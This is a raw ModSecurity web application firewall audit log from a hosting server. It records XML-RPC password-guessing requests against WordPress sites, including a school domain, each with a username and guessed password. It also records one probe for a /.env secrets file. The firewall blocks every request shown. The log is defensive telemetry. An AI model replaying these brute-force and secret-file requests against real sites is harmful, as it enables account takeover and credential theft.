OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a0c21c6c-Z-- --8f0cbe05-A-- [05/Jun/2025:17:39:59 +0700] aEFz_3-K7ToMdu-YSIJTPAAAABU 103.236.140.4 51062 103.236.140.4 8181 --8f0cbe05-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --8f0cbe05-C-- wp.getUsersBlogs kajur jessica1 --8f0cbe05-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8f0cbe05-E-- --8f0cbe05-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (79+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749119999325796 5737 (- - -) Stopwatch2: 1749119999325796 5737; combined=3905, p1=494, p2=3208, p3=0, p4=0, p5=117, sr=100, sw=86, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8f0cbe05-Z-- --64abf304-A-- [05/Jun/2025:17:40:19 +0700] aEF0E3-K7ToMdu-YSIJTQwAAAAc 103.236.140.4 51106 103.236.140.4 8181 --64abf304-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 54.78.115.243 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 54.78.115.243 X-Forwarded-Proto: https Connection: close Content-Length: 492 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --64abf304-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminadmin@123websitedev --64abf304-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --64abf304-E-- --64abf304-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 54.78.115.243 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749120019309160 4680 (- - -) Stopwatch2: 1749120019309160 4680; combined=3649, p1=402, p2=3071, p3=0, p4=0, p5=102, sr=80, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --64abf304-Z-- --0d45825c-A-- [05/Jun/2025:17:41:05 +0700] aEF0Qeth7G2xELALzPZaYgAAAMA 103.236.140.4 51222 103.236.140.4 8181 --0d45825c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --0d45825c-C-- wp.getUsersBlogs kajur england --0d45825c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0d45825c-E-- --0d45825c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (69+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749120065364373 6007 (- - -) Stopwatch2: 1749120065364373 6007; combined=4130, p1=528, p2=3438, p3=0, p4=0, p5=96, sr=89, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0d45825c-Z-- --79a8d636-A-- [05/Jun/2025:17:42:05 +0700] aEF0feth7G2xELALzPZaeAAAAMw 103.236.140.4 51368 103.236.140.4 8181 --79a8d636-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --79a8d636-C-- wp.getUsersBlogs kajur 212121 --79a8d636-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --79a8d636-E-- --79a8d636-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (62+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749120125427802 4152 (- - -) Stopwatch2: 1749120125427802 4152; combined=3191, p1=340, p2=2685, p3=0, p4=0, p5=97, sr=80, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --79a8d636-Z-- --5f8cf51b-A-- [05/Jun/2025:17:43:06 +0700] aEF0uirHpfaS2Cuwh8UHKQAAAE0 103.236.140.4 51514 103.236.140.4 8181 --5f8cf51b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 232 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --5f8cf51b-C-- wp.getUsersBlogs kesiswaan kesiswaanpassword --5f8cf51b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5f8cf51b-E-- --5f8cf51b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (61+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749120186305261 4362 (- - -) Stopwatch2: 1749120186305261 4362; combined=3293, p1=353, p2=2774, p3=0, p4=0, p5=97, sr=80, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5f8cf51b-Z-- --96f56a28-A-- [05/Jun/2025:17:44:07 +0700] aEF09-th7G2xELALzPZahQAAANM 103.236.140.4 51730 103.236.140.4 8181 --96f56a28-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 235 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --96f56a28-C-- wp.getUsersBlogs kesiswaan smkn22-jkt.sch123456 --96f56a28-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --96f56a28-E-- --96f56a28-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (87+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749120247197829 4677 (- - -) Stopwatch2: 1749120247197829 4677; combined=3335, p1=435, p2=2704, p3=0, p4=0, p5=115, sr=90, sw=81, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --96f56a28-Z-- --5d94f122-A-- [05/Jun/2025:17:45:07 +0700] aEF1M-th7G2xELALzPZaqAAAAMw 103.236.140.4 51888 103.236.140.4 8181 --5d94f122-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --5d94f122-C-- wp.getUsersBlogs kesiswaan kesiswaanPWD --5d94f122-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5d94f122-E-- --5d94f122-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (72+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749120307782706 5432 (- - -) Stopwatch2: 1749120307782706 5432; combined=3809, p1=483, p2=3157, p3=0, p4=0, p5=100, sr=100, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5d94f122-Z-- --64525012-A-- [05/Jun/2025:17:46:13 +0700] aEF1dSrHpfaS2Cuwh8UHvQAAAFE 103.236.140.4 52082 103.236.140.4 8181 --64525012-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --64525012-C-- wp.getUsersBlogs kesiswaan Admin!@# --64525012-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --64525012-E-- --64525012-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (87+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749120373080965 5400 (- - -) Stopwatch2: 1749120373080965 5400; combined=3834, p1=482, p2=3173, p3=0, p4=0, p5=105, sr=114, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --64525012-Z-- --a114a469-A-- [05/Jun/2025:17:47:13 +0700] aEF1sVwdJdhOudw5hdz8QAAAAJc 103.236.140.4 52236 103.236.140.4 8181 --a114a469-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --a114a469-C-- wp.getUsersBlogs kesiswaan asd123!@# --a114a469-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a114a469-E-- --a114a469-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (72+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749120433218053 5075 (- - -) Stopwatch2: 1749120433218053 5075; combined=3682, p1=452, p2=3062, p3=0, p4=0, p5=99, sr=93, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a114a469-Z-- --9d38573e-A-- [05/Jun/2025:17:48:15 +0700] aEF171wdJdhOudw5hdz8TAAAAIg 103.236.140.4 52398 103.236.140.4 8181 --9d38573e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --9d38573e-C-- wp.getUsersBlogs kesiswaan explorer --9d38573e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9d38573e-E-- --9d38573e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (78+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749120495515461 4454 (- - -) Stopwatch2: 1749120495515461 4454; combined=3394, p1=358, p2=2869, p3=0, p4=0, p5=98, sr=85, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9d38573e-Z-- --78c51874-A-- [05/Jun/2025:17:49:18 +0700] aEF2Ln-K7ToMdu-YSIJTqwAAAAE 103.236.140.4 52590 103.236.140.4 8181 --78c51874-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --78c51874-C-- wp.getUsersBlogs kesiswaan admin@321 --78c51874-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --78c51874-E-- --78c51874-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (84+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749120558144783 31652 (- - -) Stopwatch2: 1749120558144783 31652; combined=57850, p1=362, p2=2781, p3=0, p4=0, p5=27367, sr=81, sw=69, l=0, gc=27271 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --78c51874-Z-- --6eed7d2a-A-- [05/Jun/2025:17:49:51 +0700] aEF2TyrHpfaS2Cuwh8UINQAAAFg 103.236.140.4 52694 103.236.140.4 8181 --6eed7d2a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --6eed7d2a-C-- wp.getUsersBlogs kesiswaan 1234%^&* --6eed7d2a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6eed7d2a-E-- --6eed7d2a-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. 
This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749120591743089 5195 (- - -) Stopwatch2: 1749120591743089 5195; combined=3776, p1=460, p2=3143, p3=0, p4=0, p5=103, sr=85, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6eed7d2a-Z-- --8728204f-A-- [05/Jun/2025:17:50:18 +0700] aEF2alwdJdhOudw5hdz8ggAAAIQ 103.236.140.4 52788 103.236.140.4 8181 --8728204f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 234 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --8728204f-C-- wp.getUsersBlogs kesiswaan administrator!@#$%^ --8728204f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8728204f-E-- --8728204f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (76+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749120618046992 5290 (- - -) Stopwatch2: 1749120618046992 5290; combined=3802, p1=474, p2=3157, p3=0, p4=0, p5=100, sr=125, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8728204f-Z-- --689c3123-A-- [05/Jun/2025:17:50:33 +0700] aEF2eX-K7ToMdu-YSIJTwgAAABY 103.236.140.4 52842 103.236.140.4 8181 --689c3123-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 167.71.81.114 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 167.71.81.114 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --689c3123-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --689c3123-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749120633297958 802 (- - -) Stopwatch2: 1749120633297958 802; combined=333, p1=295, p2=0, p3=0, p4=0, p5=38, sr=102, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --689c3123-Z-- --160e4e50-A-- [05/Jun/2025:17:51:02 +0700] aEF2llwdJdhOudw5hdz8nAAAAIY 103.236.140.4 52920 103.236.140.4 8181 --160e4e50-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 92.205.20.105 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 92.205.20.105 X-Forwarded-Proto: https Connection: close Content-Length: 488 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --160e4e50-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminDeveloper@54321 --160e4e50-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --160e4e50-E-- --160e4e50-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 92.205.20.105 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749120662073247 5760 (- - -) Stopwatch2: 1749120662073247 5760; combined=4083, p1=466, p2=3439, p3=0, p4=0, p5=107, sr=90, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --160e4e50-Z-- --38648c53-A-- [05/Jun/2025:17:51:19 +0700] aEF2p3-K7ToMdu-YSIJTxQAAAAo 103.236.140.4 52970 103.236.140.4 8181 --38648c53-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --38648c53-C-- wp.getUsersBlogs kesiswaan hunter --38648c53-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --38648c53-E-- --38648c53-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
